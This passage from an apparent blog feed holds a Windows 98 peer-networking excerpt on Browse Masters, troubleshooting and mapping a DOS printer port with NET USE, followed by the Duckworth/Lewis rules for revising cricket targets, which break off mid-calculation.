<br />It is the Browse Master's job to respond to peer network browse requests from other computers wishing to view the resources, usually through Network Neighborhood. If a Browse Master leaves the network (is turned off or shut down), a new one will automatically be elected. The use of Browse Masters significantly reduces network traffic, because it eliminates the need for a peer workstation to have to query every computer within the workgroup in order to find out what resources are available. Instead, it can request a single list from the Browser Master, using a single network transaction.
<br />There is a slight memory cost for a computer acting as a Browse Master, and on some systems you may want to control whether or not they can be used for this purpose. You do this by opening the Network control panel, and then on the Configuration tab, you open the properties for File and Printer Sharing for Microsoft Networks. In the dialog box that appears, you can choose from three possible settings for the Browse Master setting: Automatic, Disable, and Enable. Automatic means that the computer may be elected to be the Browse Master, Disable means that it never will be, and Enable means that it will always be a Browse Master whenever it is turned on and participating in the workgroup. <o:p></o:p></span></p> <div class="MsoNormal" style="text-align: center;" align="center"><span style="font-size: 10pt; font-family: Verdana;"> <hr align="center" size="2" width="100%"> </span></div> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Each computer is also identified to the network for this same purpose with a computer name. You can assign whatever name you like to each computer, which is then shown as the peer network is browsed. Most people use the user's name to identify their computer, but you can use any name that makes sense.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Both the workgroup and the computer name are set by using the Identification tab of the Network control panel, shown in Figure 22.9.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><a href="javascript:popUp('09.gif')">Figure 22.9</a><o:p></o:p></span></p> <p style="text-align: justify;"><i><span style="font-size: 10pt; font-family: Verdana;">Specifying a workgroup and computer name.</span></i><span style="font-size: 10pt; font-family: Verdana;"><o:p></o:p></span></p> <h2 style="text-align: justify;"><a name="Heading7"></a><span style="font-size: 10pt; font-family: Verdana;">Troubleshooting Peer Networking Problems<o:p></o:p></span></h2> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Peer networks are fairly straightforward, but there are always problems that can crop up with any network. There are many possible points of failure, particularly when you're just setting one up. If you're having trouble with a peer network, consider the following items:<o:p></o:p></span></p> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Ensure that the network interface card is functioning. For instance, does Device Manager report a problem with the network interface card? Also, some NICs have their own diagnostic programs that can help identify a bad card. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">If you're using a 10Base-T network, is the hub functioning? It should include lights that indicate when it "sees" data on the network (traffic lights), and you should see these lights illuminate as you power a computer up that is properly connected. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Many 10Base-T Ethernet cards also support 100Mbps speeds (100Base-T). If this is the case, make sure that all of the cards on the network are set the same way, and if you're using the 100Mbps setting, make sure the hub supports that speed. Also, the network cards and hubs must also have the same setting for whether they are operating at full or half-duplex operation. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">If you're using a thin-Ethernet (10Base-2) network, make sure that you're using the right type of cable (RG-58) and that you have the correct terminators installed at each end of the network (they must be 50-ohm terminators). Also, ensure that the T-connectors are properly connected to the NIC cards, and that any barrel connectors are firmly connected. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Make sure that all the computers have the same network settings in the Network control panel; they should all be using the same client, protocol, and File and Printer Sharing service. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">If the problem is that no computers can see any others, particularly when there are more than two computers, suspect the wiring or the network hub. If you're setting up a two-computer peer network, and can borrow a third computer, this can be very useful in helping you to determine if the problem is with either of the computers, or with the wiring or hub. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Sometimes a computer won't appear in the Network Neighborhood list when it is turned on because the Browse Master hasn't updated its list yet. You can still access such computers by using the Start Menu/Find/Computer command and then specifying the name of the computer you are trying to access. <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">If a computer listed in the workgroup isn't responding and you can't open its shares, it may be because it was improperly shut down or lost power. It can take between 10-45 minutes for the Browse Master to realize that a computer is missing from the Workgroup if it didn't go through a normal shutdown process. Even when it is normally shut down, it still takes a while for the list of available computers to be updated, particularly if the computers on the network are busy (updating the browse list is a low-priority job). <o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">TCP/IP settings can often be tricky to get right. You should check and make sure that all of the TCP/IP settings are correct for each computer. See Chapter 25, "Windows 98 with TCP/IP," for more information. <o:p></o:p></span></li></ul> <h2 style="text-align: justify;"><a name="Heading8"></a><span style="font-size: 10pt; font-family: Verdana;">Conclusion<o:p></o:p></span></h2> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Peer networks can be useful in certain circumstances, such as when setting up a small network that needs only peer capabilities, or when you need to share a resource across a corporate network on occasion. However, they are much more difficult to centrally manage than a network based on Windows NT Server or NetWare. Moreover, in a larger environment, it can be wise to disable peer networking from the clients, because users will invariably share resources inappropriately, and your company may have security requirements that will be unintentionally violated.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">In this chapter, you learned about peer networking features in Windows 98, how to install them, and how to use them. You should use this chapter in concert with Chapter 21, "Understanding Windows 98 Networking." Also, if you want to perform peer networking within a traditional network environment, make sure to read Chapter 23, "Windows 98 in Windows NT Domains" and Chapter 24, "Windows 98 with NetWare/InternetWare Networks."<o:p></o:p></span></p> <h2 style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Direct DOS print outs to network printers<o:p></o:p></span></h2> <p class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">If you want to print from a DOS program to a network printer, you have to bind the printer port used by the particular DOS program to the network printer path.<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">For example, let's say your DOS program prints to <span style="color: rgb(0, 128, 255);">LPT1</span> (most DOS programs do) and your printer is on the network at the following network path:
<br />
<br /><span style="color: rgb(0, 128, 255);">\\MY_SERVER\PRINTER</span><o:p></o:p></span></p> <ul type="disc"><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Go to the "<span style="color: rgb(0, 128, 255);">DOS/Command Prompt</span>"<o:p></o:p></span></li><li class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Type the following command:
<br />
<br /> <span style="color: rgb(0, 128, 255);">NET USE LPT1: \\MY_SERVER\PRINTER
<br /> </span>
<br /> and press <span style="color: rgb(0, 128, 255);">ENTER</span>.<o:p></o:p></span></li></ul> <p class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;"><o:p> </o:p></span></p> <p class="MsoNormal" style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">Example:<o:p></o:p></span></p> <p style="text-align: justify;"><span style="font-size: 10pt; font-family: Verdana;">net (space) use (space) lpt2: (space) \\pavilion\hp1100 (space)/persistent:yes<o:p></o:p></span></p> Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-23106678229991611502008-05-21T10:25:00.004+05:302008-05-21T10:36:34.654+05:30CRITICAL METHODS<div style="text-align: left;"><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Duckworth/Lewis Method of Re-<span style="font-family:arial;">calc</span>ulating the Target Score</span></span></span></span> <span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">in an Interrupted Match. </span><span style="font-family:arial;">The Professional Edition of the Duckworth/Lewis shall be used in all matches. If </span><span style="font-family:arial;">any match is suspended after it has started such that the number of overs available </span><span style="font-family:arial;">to be faced by either side is reduced from that determined when the match started,</span> <span style="font-family:arial;">the revised target shall be computed using the latest version of CODA as </span><span style="font-family:arial;">distributed by ICC in accordance with the instructions provided with that software </span><span style="font-family:arial;">and displayed on the screen.</span></span></span></span><br /><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Where possible, arrangements shall be made for the provision of back-up </span></span></span></span><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">capability, in case of computer malfunction, for the operation or continued </span><span style="font-family:arial;">operation of the Professional Edition. In the event of computer non-availability or </span><span style="font-family:arial;">malfunction where no such provision has been made, the Standard Edition (the</span> <span style="font-family:arial;">method in use prior to October 2003) shall be used.</span></span></span></span><br /><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The regulations given below describe only the operation of the Standard Edition, </span><span style="font-family:arial;">except that Clauses 4, 6 and 7 are also applicable to the Professional Edition.</span></span></span></span><br /><br /><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Autometic Calculator:</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;"><a href="http://www.duckworth-lewis.com/Calculator/tabid/72/Default.aspx">http://www.duckworth-lewis.com/Calculator/tabid/72/Default.aspx</a></span></span></span></span><br /><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;"> </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">1. Introduction</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The D/L method sets revised targets in rain-interrupted limited-overs matches in </span></span></span></span><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">accordance with the relative run scoring resources which are at the disposal of the </span><span style="font-family:arial;">two sides. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">These are not in direct proportion to the number of overs available to be faced, as </span><span style="font-family:arial;">with the average run rate method of correction. Instead they depend on how</span></span></span></span> <span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">many overs are to go and how many wickets are down when the interruptions </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">occur. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">To calculate the revised targets, you need to know the resources available at the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">stage of the match when suspensions and resumption of play occur. All possible</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">values of resources have been pre-calculated and these are listed in the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">accompanying table.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The table covers each individual ball in a game of up to 50-overs per side. The</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">figures given in the table are percentages of the resources available for a </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">complete 50-over innings. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">For matches with less than 50-overs per innings before they start, the resource </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">percentages available at the start of an innings will be less than 100%. But the</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">same table and the same method of calculation are used whatever the number of</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">overs per innings. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 37</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">37</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The single sheet over-by-over version of the table can be used for cases when </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">play is suspended before the start of a new over. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">When Team 2 (the side batting second) have less run scoring resources at their </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">disposal than had Team 1 (the side batting first), their target is adjusted</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">downwards using the ratio of the resources available to the two sides.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">But when Team 1’s innings has been interrupted, it often happens than Team 2 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">have more resources at their disposal than had Team 1 and it is now necessary to </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">adjust Team 2’s target upwards. In this case the adjustment is based on the runs</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">that would be expected to be scored on average from the extra resources at their</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">disposal. The number of these extra runs required is calculated by applying the</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">excess resource percentage to the average total score in a 50-over innings, </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">referred to here as G50</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">For matches involving ICC full member nations, including Under-19 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">international matches, or for matches between teams that play first class cricket,</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">the value of G50 to be used at present is 235. For lower levels of the game, G50</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">should be chosen to represent the average score expected from the team batting first in an uninterrupted 50 overs-per-innings match. For teams between </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">associate ICC member nations, the recommended value of G50 is 190; for </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">women’s ODIs, the recommended value is 175. For U15 internationals, the</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">recommended value is 200. For other levels of the game, advice should be sought </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">from the ICC. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">2. Definitions</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">• The team batting first are referred to as ‘Team 1’ and the team batting second </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">are referred to as ‘Team 2’. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">• In the table decimal fractions of an over are expressed in standard cricket </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">notation; i.e. 4.3 overs means 4 overs plus 3 balls.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">• The terms ‘target’ and ‘revised target’ are reserved exclusively for the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">minimum score Team 2 need to win.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">• As with an uninterrupted match, if Team 2 make a score which is one run </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">short of the target, the match is tied. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The following symbols are used throughout:</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">N is the number of overs per innings for the match as decided at the moment of</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">delivery of the first ball of the match.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">S is Team 1’s total score.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R1 is the resource percentage (relative to a full 50-over innings) available to</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 1. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R2 is the resource percentage (relative to a full 50-over innings) available to</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">T is Team 2’s target score.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 38</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">38</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">3. Calculation of the Percentage Resource Lost by a Suspension in Play </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">To compensate for any loss of overs due to a suspension in play during either </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 1’s or Team 2’s innings, it is necessary first to calculate the resource</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">percentage that has been lost on account of this suspension. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">If the suspension occurs between overs, use the sheet of the table which gives the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">figures for whole numbers of overs. If it occurs mid-over, use the sheets of the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">table which provide the figures for each individual ball. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">3.1 For the start of the suspension in play, from the table note the resource percentage</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">that remained for the appropriate number of overs/ball left and wickets lost. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">3.2 For the resumption of play after the suspension, from the table note the resource </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">percentage now remaining for the revised number of overs/balls left and for the</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">same number of wickets lost. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">3.3 Subtract the resource percentage in 3.2 from that in 3.1 to give the resource</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">percentage lost. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">3.4 If a suspension in play causes the innings to be terminated, the resource</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">percentage on resumption (3.2) is zero and the percentage lost is the resource</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">percentage which was remaining when the suspension occurred (3.1). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">3.5 If more than one suspension in play occurs, the resource percentages lost are </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">calculated as described in 3.1 to 3.4 and are accumulated to give updated values </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">for the total resource percentage lost or resource available for the innings. This is</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">done after each suspension as described in 5.2 and 5.5. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">4. Penalties for Slow Over Rates </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">No overs penalties are imposed for slow over rates and hence slow over rates </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">have no effect on revised target calculations. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">5. Calculation of Revised Targets </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">5.1 Note the number of overs per innings decided at the start of the game, N. From</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">the table note the resource percentage available to Team 1 at the start of their innings. (For N = 50 this is 100%.) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">5.2 For all suspensions and any premature termination of Team 1’s innings, calculate </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">the total resource percentage lost using the procedure described in section 3. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Subtract this from the starting resource percentage (5.1) to give R1, the resource </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">which was available to Team 1 for their innings. Note Team 1’s total score, S. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">5.3 There is no overs penalty for slow over rates by either side. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 39</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">39</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">5.4 Note the number of overs allocated to Team 2 at the start of their innings and </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">from the table note the resource percentage for this number of overs remaining </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">and 0 wicket lost. This is R2, the resource percentage available to Team 2. If R2</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">differs from R1, which will happen if Team 1’s innings was interrupted and/or </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s was delayed, a revised target must be set. Calculate this revised target, </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">T, as described in 5.6 below.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">5.5 For each suspension of play during Team 2’s innings or for premature </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">termination of the match, update the resource percentage available, R2, by</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">subtracting the resource percentage lost calculated as in section 3. Calculate the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">revised target, T, after each suspension as described in 5.6 below. If the match </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">has to be terminated, the result is decided by comparing Team 2’s score at the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">time with the ‘par score’, this being the value as calculated in the formulae for T</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">in 5.6 below, but without the one run added. If it is greater, Team 2 win. If it is</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">equal, the match is tied. If it is less, Team 1 win.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">5.6 If R2 is less than R1, Team 2’s revised target is obtained by reducing Team 1’s </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">score S in the ratio of R2 to R1, ignoring any figures after the decimal point, and</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">adding one run </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">i.e. T = (S x R2/R1) + 1 (rounded down to a whole number, if necessary).</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">If R2 is equal to R1, no revision is needed and Team 2’s target is one more run </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">than Team 1’s score. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">i.e. T = S + 1</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">If R2 is greater than R1, calculate the amount of excess resources, R2 – R1, and </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">take this percentage of the average 50-over total, G50, to give the extra 